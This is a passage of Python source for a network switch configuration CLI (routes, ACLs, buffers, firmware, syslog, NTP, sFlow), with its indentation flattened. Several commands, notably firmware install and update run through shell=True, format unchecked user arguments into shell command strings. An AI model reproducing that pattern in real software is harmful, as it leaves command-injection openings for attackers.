for key in vxlan_keys:
if (vxlan_table[key]['vni'] == vni):
found = 1
break
if (found == 0):
ctx.fail("VLAN VNI not mapped. Please create VLAN VNI map entry first")
found = 0
vrf_table = config_db.get_table('VRF')
vrf_keys = vrf_table.keys()
if vrf_keys is not None:
for vrf_key in vrf_keys:
if ('vni' in vrf_table[vrf_key] and vrf_table[vrf_key]['vni'] == vni):
found = 1
break
if (found == 1):
ctx.fail("VNI already mapped to vrf {}".format(vrf_key))
config_db.mod_entry('VRF', vrfname, {"vni": vni})
@vrf.command('del_vrf_vni_map')
@click.argument('vrfname', metavar='<vrf-name>', required=True, type=str)
@click.pass_context
def del_vrf_vni_map(ctx, vrfname):
config_db = ctx.obj['config_db']
if vrfname not in config_db.get_table('VRF').keys():
ctx.fail("vrf {} doesnt exists".format(vrfname))
config_db.mod_entry('VRF', vrfname, {"vni": 0})
#
# 'route' group ('config route ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def route(ctx):
"""route-related configuration tasks"""
pass
@route.command('add', context_settings={"ignore_unknown_options":True})
@click.argument('command_str', metavar='prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>', nargs=-1, type=click.Path())
@click.pass_context
def add_route(ctx, command_str):
"""Add route command"""
if len(command_str) < 4 or len(command_str) > 9:
ctx.fail("argument is not in pattern prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>!")
if "prefix" not in command_str:
ctx.fail("argument is incomplete, prefix not found!")
if "nexthop" not in command_str:
ctx.fail("argument is incomplete, nexthop not found!")
for i in range(0, len(command_str)):
if "nexthop" == command_str[i]:
prefix_str = command_str[:i]
nexthop_str = command_str[i:]
vrf_name = ""
cmd = 'sudo vtysh -c "configure terminal" -c "ip route'
if prefix_str:
if len(prefix_str) == 2:
prefix_mask = prefix_str[1]
cmd += ' {}'.format(prefix_mask)
elif len(prefix_str) == 4:
vrf_name = prefix_str[2]
prefix_mask = prefix_str[3]
cmd += ' {}'.format(prefix_mask)
else:
ctx.fail("prefix is not in pattern!")
if nexthop_str:
if len(nexthop_str) == 2:
ip = nexthop_str[1]
if vrf_name == "":
cmd += ' {}'.format(ip)
else:
cmd += ' {} vrf {}'.format(ip, vrf_name)
elif len(nexthop_str) == 3:
dev_name = nexthop_str[2]
if vrf_name == "":
cmd += ' {}'.format(dev_name)
else:
cmd += ' {} vrf {}'.format(dev_name, vrf_name)
elif len(nexthop_str) == 4:
vrf_name_dst = nexthop_str[2]
ip = nexthop_str[3]
if vrf_name == "":
cmd += ' {} nexthop-vrf {}'.format(ip, vrf_name_dst)
else:
cmd += ' {} vrf {} nexthop-vrf {}'.format(ip, vrf_name, vrf_name_dst)
else:
ctx.fail("nexthop is not in pattern!")
cmd += '"'
clicommon.run_command(cmd)
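# Worked example (assumed inputs, not taken from this file) of how the parsing
# above maps a 'config route add' invocation onto a vtysh command. For
#   config route add prefix vrf Vrf-red 10.0.0.0/24 nexthop vrf Vrf-blue 192.168.0.1
# command_str is
#   ('prefix', 'vrf', 'Vrf-red', '10.0.0.0/24', 'nexthop', 'vrf', 'Vrf-blue', '192.168.0.1')
# so prefix_str has length 4 (vrf + prefix) and nexthop_str has length 4
# (nexthop-vrf + ip), producing:
#   sudo vtysh -c "configure terminal" -c "ip route 10.0.0.0/24 192.168.0.1 vrf Vrf-red nexthop-vrf Vrf-blue"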
@route.command('del', context_settings={"ignore_unknown_options":True})
@click.argument('command_str', metavar='prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>', nargs=-1, type=click.Path())
@click.pass_context
def del_route(ctx, command_str):
"""Del route command"""
if len(command_str) < 4 or len(command_str) > 9:
ctx.fail("argument is not in pattern prefix [vrf <vrf_name>] <A.B.C.D/M> nexthop <[vrf <vrf_name>] <A.B.C.D>>|<dev <dev_name>>!")
if "prefix" not in command_str:
ctx.fail("argument is incomplete, prefix not found!")
if "nexthop" not in command_str:
ctx.fail("argument is incomplete, nexthop not found!")
for i in range(0, len(command_str)):
if "nexthop" == command_str[i]:
prefix_str = command_str[:i]
nexthop_str = command_str[i:]
vrf_name = ""
cmd = 'sudo vtysh -c "configure terminal" -c "no ip route'
if prefix_str:
if len(prefix_str) == 2:
prefix_mask = prefix_str[1]
cmd += ' {}'.format(prefix_mask)
elif len(prefix_str) == 4:
vrf_name = prefix_str[2]
prefix_mask = prefix_str[3]
cmd += ' {}'.format(prefix_mask)
else:
ctx.fail("prefix is not in pattern!")
if nexthop_str:
if len(nexthop_str) == 2:
ip = nexthop_str[1]
if vrf_name == "":
cmd += ' {}'.format(ip)
else:
cmd += ' {} vrf {}'.format(ip, vrf_name)
elif len(nexthop_str) == 3:
dev_name = nexthop_str[2]
if vrf_name == "":
cmd += ' {}'.format(dev_name)
else:
cmd += ' {} vrf {}'.format(dev_name, vrf_name)
elif len(nexthop_str) == 4:
vrf_name_dst = nexthop_str[2]
ip = nexthop_str[3]
if vrf_name == "":
cmd += ' {} nexthop-vrf {}'.format(ip, vrf_name_dst)
else:
cmd += ' {} vrf {} nexthop-vrf {}'.format(ip, vrf_name, vrf_name_dst)
else:
ctx.fail("nexthop is not in pattern!")
cmd += '"'
clicommon.run_command(cmd)
#
# 'acl' group ('config acl ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def acl():
"""ACL-related configuration tasks"""
pass
#
# 'add' subgroup ('config acl add ...')
#
@acl.group(cls=clicommon.AbbreviationGroup)
def add():
"""
Add ACL configuration.
"""
pass
def get_acl_bound_ports():
config_db = ConfigDBConnector()
config_db.connect()
ports = set()
portchannel_members = set()
portchannel_member_dict = config_db.get_table("PORTCHANNEL_MEMBER")
for key in portchannel_member_dict:
ports.add(key[0])
portchannel_members.add(key[1])
port_dict = config_db.get_table("PORT")
for key in port_dict:
if key not in portchannel_members:
ports.add(key)
return list(ports)
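# Minimal sketch (hypothetical data, not read from CONFIG_DB) of the set logic
# above: ACL tables are bound to port channels plus every physical port that is
# not itself a port-channel member.
def _example_acl_bound_ports(portchannel_members, ports):
    """portchannel_members: iterable of (portchannel, member) keys; ports: iterable of port names."""
    bound = set()
    members = set()
    for pc, member in portchannel_members:
        bound.add(pc)
        members.add(member)
    bound.update(p for p in ports if p not in members)
    return sorted(bound)

# _example_acl_bound_ports([("PortChannel0001", "Ethernet0")], ["Ethernet0", "Ethernet4"])
# -> ['Ethernet4', 'PortChannel0001']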
#
# 'table' subcommand ('config acl add table ...')
#
@add.command()
@click.argument("table_name", metavar="<table_name>")
@click.argument("table_type", metavar="<table_type>")
@click.option("-d", "--description")
@click.option("-p", "--ports")
@click.option("-s", "--stage", type=click.Choice(["ingress", "egress"]), default="ingress")
def table(table_name, table_type, description, ports, stage):
"""
Add ACL table
"""
config_db = ConfigDBConnector()
config_db.connect()
table_info = {"type": table_type}
if description:
table_info["policy_desc"] = description
else:
table_info["policy_desc"] = table_name
if ports:
table_info["ports@"] = ports
else:
table_info["ports@"] = ",".join(get_acl_bound_ports())
table_info["stage"] = stage
config_db.set_entry("ACL_TABLE", table_name, table_info)
#
# 'remove' subgroup ('config acl remove ...')
#
@acl.group(cls=clicommon.AbbreviationGroup)
def remove():
"""
Remove ACL configuration.
"""
pass
#
# 'table' subcommand ('config acl remove table ...')
#
@remove.command()
@click.argument("table_name", metavar="<table_name>")
def table(table_name):
"""
Remove ACL table
"""
config_db = ConfigDBConnector()
config_db.connect()
config_db.set_entry("ACL_TABLE", table_name, None)
#
# 'acl update' group
#
@acl.group(cls=clicommon.AbbreviationGroup)
def update():
"""ACL-related configuration tasks"""
pass
#
# 'full' subcommand
#
@update.command()
@click.argument('file_name', required=True)
def full(file_name):
"""Full update of ACL rules configuration."""
log.log_info("'acl update full {}' executing...".format(file_name))
command = "acl-loader update full {}".format(file_name)
clicommon.run_command(command)
#
# 'incremental' subcommand
#
@update.command()
@click.argument('file_name', required=True)
def incremental(file_name):
"""Incremental update of ACL rule configuration."""
log.log_info("'acl update incremental {}' executing...".format(file_name))
command = "acl-loader update incremental {}".format(file_name)
clicommon.run_command(command)
#
# 'dropcounters' group ('config dropcounters ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def dropcounters():
"""Drop counter related configuration tasks"""
pass
#
# 'install' subcommand ('config dropcounters install')
#
@dropcounters.command()
@click.argument("counter_name", type=str, required=True)
@click.argument("counter_type", type=str, required=True)
@click.argument("reasons", type=str, required=True)
@click.option("-a", "--alias", type=str, help="Alias for this counter")
@click.option("-g", "--group", type=str, help="Group for this counter")
@click.option("-d", "--desc", type=str, help="Description for this counter")
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def install(counter_name, alias, group, counter_type, desc, reasons, verbose):
"""Install a new drop counter"""
command = "dropconfig -c install -n '{}' -t '{}' -r '{}'".format(counter_name, counter_type, reasons)
if alias:
command += " -a '{}'".format(alias)
if group:
command += " -g '{}'".format(group)
if desc:
command += " -d '{}'".format(desc)
clicommon.run_command(command, display_cmd=verbose)
#
# 'delete' subcommand ('config dropcounters delete')
#
@dropcounters.command()
@click.argument("counter_name", type=str, required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def delete(counter_name, verbose):
"""Delete an existing drop counter"""
command = "dropconfig -c uninstall -n {}".format(counter_name)
clicommon.run_command(command, display_cmd=verbose)
#
# 'add-reasons' subcommand ('config dropcounters add-reasons')
#
@dropcounters.command('add-reasons')
@click.argument("counter_name", type=str, required=True)
@click.argument("reasons", type=str, required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def add_reasons(counter_name, reasons, verbose):
"""Add reasons to an existing drop counter"""
command = "dropconfig -c add -n {} -r {}".format(counter_name, reasons)
clicommon.run_command(command, display_cmd=verbose)
#
# 'remove-reasons' subcommand ('config dropcounters remove-reasons')
#
@dropcounters.command('remove-reasons')
@click.argument("counter_name", type=str, required=True)
@click.argument("reasons", type=str, required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def remove_reasons(counter_name, reasons, verbose):
"""Remove reasons from an existing drop counter"""
command = "dropconfig -c remove -n {} -r {}".format(counter_name, reasons)
clicommon.run_command(command, display_cmd=verbose)
#
# 'ecn' command ('config ecn ...')
#
@config.command()
@click.option('-profile', metavar='<profile_name>', type=str, required=True, help="Profile name")
@click.option('-rmax', metavar='<red threshold max>', type=int, help="Set red max threshold")
@click.option('-rmin', metavar='<red threshold min>', type=int, help="Set red min threshold")
@click.option('-ymax', metavar='<yellow threshold max>', type=int, help="Set yellow max threshold")
@click.option('-ymin', metavar='<yellow threshold min>', type=int, help="Set yellow min threshold")
@click.option('-gmax', metavar='<green threshold max>', type=int, help="Set green max threshold")
@click.option('-gmin', metavar='<green threshold min>', type=int, help="Set green min threshold")
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def ecn(profile, rmax, rmin, ymax, ymin, gmax, gmin, verbose):
"""ECN-related configuration tasks"""
log.log_info("'ecn -profile {}' executing...".format(profile))
command = "ecnconfig -p %s" % profile
if rmax is not None: command += " -rmax %d" % rmax
if rmin is not None: command += " -rmin %d" % rmin
if ymax is not None: command += " -ymax %d" % ymax
if ymin is not None: command += " -ymin %d" % ymin
if gmax is not None: command += " -gmax %d" % gmax
if gmin is not None: command += " -gmin %d" % gmin
if verbose: command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
#
# 'pfc' group ('config interface pfc ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def pfc(ctx):
"""Set PFC configuration."""
pass
#
# 'pfc asymmetric' ('config interface pfc asymmetric ...')
#
@pfc.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('status', type=click.Choice(['on', 'off']))
@click.pass_context
def asymmetric(ctx, interface_name, status):
"""Set asymmetric PFC configuration."""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
clicommon.run_command("pfc config asymmetric {0} {1}".format(status, interface_name))
#
# 'pfc priority' command ('config interface pfc priority ...')
#
@pfc.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('priority', type=click.Choice([str(x) for x in range(8)]))
@click.argument('status', type=click.Choice(['on', 'off']))
@click.pass_context
def priority(ctx, interface_name, priority, status):
"""Set PFC priority configuration."""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
clicommon.run_command("pfc config priority {0} {1} {2}".format(status, interface_name, priority))
#
# 'buffer' group ('config buffer ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def buffer(ctx):
"""Configure buffer_profile"""
config_db = ConfigDBConnector()
config_db.connect()
if not is_dynamic_buffer_enabled(config_db):
ctx.fail("This command can only be supported on a system with dynamic buffer enabled")
@buffer.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def profile(ctx):
"""Configure buffer profile"""
pass
@profile.command('add')
@click.argument('profile', metavar='<profile>', required=True)
@click.option('--xon', metavar='<xon>', type=int, help="Set xon threshold")
@click.option('--xoff', metavar='<xoff>', type=int, help="Set xoff threshold")
@click.option('--size', metavar='<size>', type=int, help="Set reserved size size")
@click.option('--dynamic_th', metavar='<dynamic_th>', type=str, help="Set dynamic threshold")
@click.option('--pool', metavar='<pool>', type=str, help="Buffer pool")
@clicommon.pass_db
def add_profile(db, profile, xon, xoff, size, dynamic_th, pool):
"""Add or modify a buffer profile"""
config_db = db.cfgdb
ctx = click.get_current_context()
profile_entry = config_db.get_entry('BUFFER_PROFILE', profile)
if profile_entry:
ctx.fail("Profile {} already exist".format(profile))
update_profile(ctx, config_db, profile, xon, xoff, size, dynamic_th, pool)
@profile.command('set')
@click.argument('profile', metavar='<profile>', required=True)
@click.option('--xon', metavar='<xon>', type=int, help="Set xon threshold")
@click.option('--xoff', metavar='<xoff>', type=int, help="Set xoff threshold")
@click.option('--size', metavar='<size>', type=int, help="Set reserved size size")
@click.option('--dynamic_th', metavar='<dynamic_th>', type=str, help="Set dynamic threshold")
@click.option('--pool', metavar='<pool>', type=str, help="Buffer pool")
@clicommon.pass_db
def set_profile(db, profile, xon, xoff, size, dynamic_th, pool):
"""Add or modify a buffer profile"""
config_db = db.cfgdb
ctx = click.get_current_context()
profile_entry = config_db.get_entry('BUFFER_PROFILE', profile)
if not profile_entry:
ctx.fail("Profile {} doesn't exist".format(profile))
if 'xoff' not in profile_entry and xoff:
ctx.fail("Can't change profile {} from dynamically calculated headroom to statically configured headroom".format(profile))
update_profile(ctx, config_db, profile, xon, xoff, size, dynamic_th, pool, profile_entry)
def update_profile(ctx, config_db, profile_name, xon, xoff, size, dynamic_th, pool, profile_entry = None):
params = {}
if profile_entry:
params = profile_entry
dynamic_calculate = True
if not pool:
pool = 'ingress_lossless_pool'
params['pool'] = '[BUFFER_POOL|' + pool + ']'
if not config_db.get_entry('BUFFER_POOL', pool):
ctx.fail("Pool {} doesn't exist".format(pool))
if xon:
params['xon'] = xon
dynamic_calculate = False
else:
xon = params.get('xon')
if xoff:
params['xoff'] = xoff
dynamic_calculate = False
else:
xoff = params.get('xoff')
if size:
params['size'] = size
dynamic_calculate = False
if xon and not xoff:
xoff = int(size) - int(xon)
params['xoff'] = xoff
elif not dynamic_calculate:
if xon and xoff:
size = int(xon) + int(xoff)
params['size'] = size
else:
ctx.fail("Either both xon and xoff or size should be provided")
if dynamic_calculate:
params['headroom_type'] = 'dynamic'
if not dynamic_th:
ctx.fail("Either size information (xon, xoff, size) or dynamic_th needs to be provided")
if dynamic_th:
params['dynamic_th'] = dynamic_th
else:
# Fetch all the keys of default_lossless_buffer_parameter table
# and then get the default_dynamic_th from that entry (should be only one)
keys = config_db.get_keys('DEFAULT_LOSSLESS_BUFFER_PARAMETER')
if len(keys) > 1 or len(keys) == 0:
ctx.fail("Multiple or no entry in DEFAULT_LOSSLESS_BUFFER_PARAMETER found while no dynamic_th specified")
default_lossless_param = config_db.get_entry('DEFAULT_LOSSLESS_BUFFER_PARAMETER', keys[0])
if 'default_dynamic_th' in default_lossless_param.keys():
params['dynamic_th'] = default_lossless_param['default_dynamic_th']
else:
ctx.fail("No dynamic_th defined in DEFAULT_LOSSLESS_BUFFER_PARAMETER")
config_db.set_entry("BUFFER_PROFILE", (profile_name), params)
@profile.command('remove')
@click.argument('profile', metavar='<profile>', required=True)
@clicommon.pass_db
def remove_profile(db, profile):
"""Delete a buffer profile"""
config_db = db.cfgdb
ctx = click.get_current_context()
full_profile_name = '[BUFFER_PROFILE|{}]'.format(profile)
existing_pgs = config_db.get_table("BUFFER_PG")
for k, v in existing_pgs.items():
port, pg = k
referenced_profile = v.get('profile')
if referenced_profile and referenced_profile == full_profile_name:
ctx.fail("Profile {} is referenced by {}|{} and can't be removed".format(profile, port, pg))
entry = config_db.get_entry("BUFFER_PROFILE", profile)
if entry:
config_db.set_entry("BUFFER_PROFILE", profile, None)
else:
ctx.fail("Profile {} doesn't exist".format(profile))
#
# 'platform' group ('config platform ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
def platform():
"""Platform-related configuration tasks"""
# 'firmware' subgroup ("config platform firmware ...")
@platform.group(cls=clicommon.AbbreviationGroup)
def firmware():
"""Firmware configuration tasks"""
pass
# 'install' subcommand ("config platform firmware install")
@firmware.command(
context_settings=dict(
ignore_unknown_options=True,
allow_extra_args=True
),
add_help_option=False
)
@click.argument('args', nargs=-1, type=click.UNPROCESSED)
def install(args):
"""Install platform firmware"""
cmd = "fwutil install {}".format(" ".join(args))
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
sys.exit(e.returncode)
# 'update' subcommand ("config platform firmware update")
@firmware.command(
context_settings=dict(
ignore_unknown_options=True,
allow_extra_args=True
),
add_help_option=False
)
@click.argument('args', nargs=-1, type=click.UNPROCESSED)
def update(args):
"""Update platform firmware"""
cmd = "fwutil update {}".format(" ".join(args))
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
sys.exit(e.returncode)
#
# 'watermark' group ("config watermark telemetry interval")
#
@config.group(cls=clicommon.AbbreviationGroup)
def watermark():
"""Configure watermark """
pass
@watermark.group(cls=clicommon.AbbreviationGroup)
def telemetry():
"""Configure watermark telemetry"""
pass
@telemetry.command()
@click.argument('interval', required=True)
def interval(interval):
"""Configure watermark telemetry interval"""
command = 'watermarkcfg --config-interval ' + interval
clicommon.run_command(command)
#
# 'interface_naming_mode' subgroup ('config interface_naming_mode ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='interface_naming_mode')
def interface_naming_mode():
"""Modify interface naming mode for interacting with SONiC CLI"""
pass
@interface_naming_mode.command('default')
def naming_mode_default():
"""Set CLI interface naming mode to DEFAULT (SONiC port name)"""
set_interface_naming_mode('default')
@interface_naming_mode.command('alias')
def naming_mode_alias():
"""Set CLI interface naming mode to ALIAS (Vendor port alias)"""
set_interface_naming_mode('alias')
def is_loopback_name_valid(loopback_name):
"""Loopback name validation
"""
if loopback_name[:CFG_LOOPBACK_PREFIX_LEN] != CFG_LOOPBACK_PREFIX :
return False
if (loopback_name[CFG_LOOPBACK_PREFIX_LEN:].isdigit() is False or
int(loopback_name[CFG_LOOPBACK_PREFIX_LEN:]) > CFG_LOOPBACK_ID_MAX_VAL) :
return False
if len(loopback_name) > CFG_LOOPBACK_NAME_TOTAL_LEN_MAX:
return False
return True
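# Examples, assuming the usual constants elsewhere in this module (prefix
# "Loopback", a numeric suffix, a bounded id and a bounded total length):
# "Loopback0" and "Loopback123" pass the checks above, while "loopback0"
# (wrong prefix case), "LoopbackX" (non-numeric suffix) and an id above
# CFG_LOOPBACK_ID_MAX_VAL are rejected.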
#
# 'loopback' group ('config loopback ...')
#
@config.group()
@click.pass_context
@click.option('-s', '--redis-unix-socket-path', help='unix socket path for redis connection')
def loopback(ctx, redis_unix_socket_path):
"""Loopback-related configuration tasks"""
kwargs = {}
if redis_unix_socket_path:
kwargs['unix_socket_path'] = redis_unix_socket_path
config_db = ConfigDBConnector(**kwargs)
config_db.connect(wait_for_init=False)
ctx.obj = {'db': config_db}
@loopback.command('add')
@click.argument('loopback_name', metavar='<loopback_name>', required=True)
@click.pass_context
def add_loopback(ctx, loopback_name):
config_db = ctx.obj['db']
if is_loopback_name_valid(loopback_name) is False:
ctx.fail("{} is invalid, name should have prefix '{}' and suffix '{}' "
.format(loopback_name, CFG_LOOPBACK_PREFIX, CFG_LOOPBACK_NO))
lo_intfs = [k for k, v in config_db.get_table('LOOPBACK_INTERFACE').items() if type(k) != tuple]
if loopback_name in lo_intfs:
ctx.fail("{} already exists".format(loopback_name))
config_db.set_entry('LOOPBACK_INTERFACE', loopback_name, {"NULL" : "NULL"})
@loopback.command('del')
@click.argument('loopback_name', metavar='<loopback_name>', required=True)
@click.pass_context
def del_loopback(ctx, loopback_name):
config_db = ctx.obj['db']
if is_loopback_name_valid(loopback_name) is False:
ctx.fail("{} is invalid, name should have prefix '{}' and suffix '{}' "
.format(loopback_name, CFG_LOOPBACK_PREFIX, CFG_LOOPBACK_NO))
lo_config_db = config_db.get_table('LOOPBACK_INTERFACE')
lo_intfs = [k for k, v in lo_config_db.items() if type(k) != tuple]
if loopback_name not in lo_intfs:
ctx.fail("{} does not exists".format(loopback_name))
ips = [ k[1] for k in lo_config_db if type(k) == tuple and k[0] == loopback_name ]
for ip in ips:
config_db.set_entry('LOOPBACK_INTERFACE', (loopback_name, ip), None)
config_db.set_entry('LOOPBACK_INTERFACE', loopback_name, None)
@config.group(cls=clicommon.AbbreviationGroup)
def ztp():
""" Configure Zero Touch Provisioning """
if os.path.isfile('/usr/bin/ztp') is False:
exit("ZTP feature unavailable in this image version")
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
@ztp.command()
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='ZTP will be restarted. You may lose switch data and connectivity, continue?')
@click.argument('run', required=False, type=click.Choice(["run"]))
def run(run):
"""Restart ZTP of the device."""
command = "ztp run -y"
clicommon.run_command(command, display_cmd=True)
@ztp.command()
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false,
expose_value=False, prompt='Active ZTP session will be stopped and disabled, continue?')
@click.argument('disable', required=False, type=click.Choice(["disable"]))
def disable(disable):
"""Administratively Disable ZTP."""
command = "ztp disable -y"
clicommon.run_command(command, display_cmd=True)
@ztp.command()
@click.argument('enable', required=False, type=click.Choice(["enable"]))
def enable(enable):
"""Administratively Enable ZTP."""
command = "ztp enable"
clicommon.run_command(command, display_cmd=True)
#
# 'syslog' group ('config syslog ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='syslog')
@click.pass_context
def syslog_group(ctx):
"""Syslog server configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@syslog_group.command('add')
@click.argument('syslog_ip_address', metavar='<syslog_ip_address>', required=True)
@click.pass_context
def add_syslog_server(ctx, syslog_ip_address):
""" Add syslog server IP """
if not clicommon.is_ipaddress(syslog_ip_address):
ctx.fail('Invalid ip address')
db = ctx.obj['db']
syslog_servers = db.get_table("SYSLOG_SERVER")
if syslog_ip_address in syslog_servers:
click.echo("Syslog server {} is already configured".format(syslog_ip_address))
return
else:
db.set_entry('SYSLOG_SERVER', syslog_ip_address, {'NULL': 'NULL'})
click.echo("Syslog server {} added to configuration".format(syslog_ip_address))
try:
click.echo("Restarting rsyslog-config service...")
clicommon.run_command("systemctl restart rsyslog-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service rsyslog-config failed with error {}".format(e))
@syslog_group.command('del')
@click.argument('syslog_ip_address', metavar='<syslog_ip_address>', required=True)
@click.pass_context
def del_syslog_server(ctx, syslog_ip_address):
""" Delete syslog server IP """
if not clicommon.is_ipaddress(syslog_ip_address):
ctx.fail('Invalid IP address')
db = ctx.obj['db']
syslog_servers = db.get_table("SYSLOG_SERVER")
if syslog_ip_address in syslog_servers:
db.set_entry('SYSLOG_SERVER', '{}'.format(syslog_ip_address), None)
click.echo("Syslog server {} removed from configuration".format(syslog_ip_address))
else:
ctx.fail("Syslog server {} is not configured.".format(syslog_ip_address))
try:
click.echo("Restarting rsyslog-config service...")
clicommon.run_command("systemctl restart rsyslog-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service rsyslog-config failed with error {}".format(e))
#
# 'ntp' group ('config ntp ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def ntp(ctx):
"""NTP server configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
@ntp.command('add')
@click.argument('ntp_ip_address', metavar='<ntp_ip_address>', required=True)
@click.pass_context
def add_ntp_server(ctx, ntp_ip_address):
""" Add NTP server IP """
if not clicommon.is_ipaddress(ntp_ip_address):
ctx.fail('Invalid ip address')
db = ctx.obj['db']
ntp_servers = db.get_table("NTP_SERVER")
if ntp_ip_address in ntp_servers:
click.echo("NTP server {} is already configured".format(ntp_ip_address))
return
else:
db.set_entry('NTP_SERVER', ntp_ip_address, {'NULL': 'NULL'})
click.echo("NTP server {} added to configuration".format(ntp_ip_address))
try:
click.echo("Restarting ntp-config service...")
clicommon.run_command("systemctl restart ntp-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service ntp-config failed with error {}".format(e))
@ntp.command('del')
@click.argument('ntp_ip_address', metavar='<ntp_ip_address>', required=True)
@click.pass_context
def del_ntp_server(ctx, ntp_ip_address):
""" Delete NTP server IP """
if not clicommon.is_ipaddress(ntp_ip_address):
ctx.fail('Invalid IP address')
db = ctx.obj['db']
ntp_servers = db.get_table("NTP_SERVER")
if ntp_ip_address in ntp_servers:
db.set_entry('NTP_SERVER', '{}'.format(ntp_ip_address), None)
click.echo("NTP server {} removed from configuration".format(ntp_ip_address))
else:
ctx.fail("NTP server {} is not configured.".format(ntp_ip_address))
try:
click.echo("Restarting ntp-config service...")
clicommon.run_command("systemctl restart ntp-config", display_cmd=False)
except SystemExit as e:
ctx.fail("Restart service ntp-config failed with error {}".format(e))
#
# 'sflow' group ('config sflow ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def sflow(ctx):
"""sFlow-related configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {'db': config_db}
#
# 'sflow' command ('config sflow enable')
#
@sflow.command()
@click.pass_context
def enable(ctx):
"""Enable sFlow"""
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'up'}}
else:
sflow_tbl['global']['admin_state'] = 'up'
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
try:
proc = subprocess.Popen("systemctl is-active sflow", shell=True, text=True, stdout=subprocess.PIPE)
(out, err) = proc.communicate()
except SystemExit as e:
ctx.fail("Unable to check sflow status {}".format(e))
if out != "active":
log.log_info("sflow service is not enabled. Starting sflow docker...")
clicommon.run_command("sudo systemctl enable sflow")
clicommon.run_command("sudo systemctl start sflow")
#
# 'sflow' command ('config sflow disable')
#
@sflow.command()
@click.pass_context
def disable(ctx):
"""Disable sFlow"""
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
else:
sflow_tbl['global']['admin_state'] = 'down'
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
#
# 'sflow' command ('config sflow polling-interval ...')
#
@sflow.command('polling-interval')
@click.argument('interval', metavar='<polling_interval>', required=True,
type=int)
@click.pass_context
def polling_int(ctx, interval):
"""Set polling-interval for counter-sampling (0 to disable)"""
if interval not in range(5, 301) and interval != 0:
click.echo("Polling interval must be between 5-300 (0 to disable)")
return
config_db = ctx.obj['db']
sflow_tbl = config_db.get_table('SFLOW')
if not sflow_tbl:
sflow_tbl = {'global': {'admin_state': 'down'}}
sflow_tbl['global']['polling_interval'] = interval
config_db.mod_entry('SFLOW', 'global', sflow_tbl['global'])
def is_valid_sample_rate(rate):
return rate in range(256, 8388608 + 1)
#
# 'sflow interface' group
#
@sflow.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def interface(ctx):
"""Configure sFlow settings for an interface"""
pass
#
# 'sflow' command ('config sflow interface enable ...')
#
@interface.command()
@click.argument('ifname', metavar='<interface_name>', required=True, type=str)
@click.pass_context
def enable(ctx, ifname):
config_db = ctx.obj['db']
if not interface_name_is_valid(config_db, ifname) and ifname != 'all':
click.echo("Invalid interface name")
return
intf_dict = config_db.get_table('SFLOW_SESSION')
if intf_dict and ifname in intf_dict:
intf_dict[ifname]['admin_state'] = 'up'
config_db.mod_entry('SFLOW_SESSION', ifname, intf_dict[ifname])
else:
config_db.mod_entry('SFLOW_SESSION', ifname, {'admin_state': 'up'})
#
# 'sflow' command ('config sflow interface disable ...')
#
@interface.command()
@click.argument('ifname', metavar='<interface_name>', required=True, type=str)
@click.pass_context
def disable(ctx, ifname):
config_db = ctx.obj['db']
if not interface_name_is_valid(config_db, ifname) and ifname != 'all':
click.echo("Invalid interface name")
return
intf_dict = config_db.get_table('SFLOW_SESSION')
if intf_dict and ifname in intf_dict:
intf_dict[ifname]['admin_state'] = 'down'
config_db.mod_entry('SFLOW_SESSION', ifname, intf_dict[ifname])
else:
config_db.mod_entry('SFLOW_SESSION', ifname,
{'admin_state': 'down'})
#
# 'sflow' command ('config sflow interface sample-rate ...')
#
@interface.command('sample-rate')
@click.argument('ifname', metavar='<interface_name>', required=True, type=str)
